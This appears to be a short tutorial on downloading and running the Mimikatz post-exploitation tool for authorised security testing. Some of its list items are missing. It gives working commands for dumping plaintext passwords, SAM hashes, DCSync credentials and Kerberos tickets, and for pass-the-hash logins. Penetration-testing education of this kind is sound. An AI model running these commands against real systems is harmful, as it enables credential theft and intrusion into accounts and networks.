Mimikatz is a powerful post-exploitation tool designed to extract plaintext passwords, hashes, PIN codes, and Kerberos tickets from memory. It is widely used by penetration testers and security professionals to assess system vulnerabilities. This guide provides a step-by-step approach to installing and using Mimikatz for ethical security testing.
Warning: Unauthorized use of Mimikatz is illegal. Ensure you have permission before using it in any environment.
Before installing Mimikatz, make sure you have the following:
Mimikatz is an open-source tool available on GitHub. To download it:
Alternatively, you can clone the repository using Git:
git clone https://github.com/gentilkiwi/mimikatz.git
Since Mimikatz requires administrative privileges, follow these steps to run it:
cd path\to\mimikatz\x64
mimikatz.exe
mimikatz #
prompt.Before extracting credentials, verify that you have sufficient privileges:
privilege::debug
If successful, you should see: Privilege '20' OK
To dump plaintext passwords from memory, use:
sekurlsa::logonpasswords
This will display username, domain, and passwords in plaintext if available.
NTLM hashes can be used for pass-the-hash attacks. To extract them, run:
lsadump::sam
Or, for remote systems:
lsadump::dcsync /domain:targetdomain.com /user:Administrator
To retrieve Kerberos tickets from the system:
sekurlsa::tickets /export
This exports .kirbi
files, which can be used in pass-the-ticket attacks.
To authenticate with an NTLM hash instead of a password:
sekurlsa::pth /user:Administrator /domain:example.com /ntlm:<hash>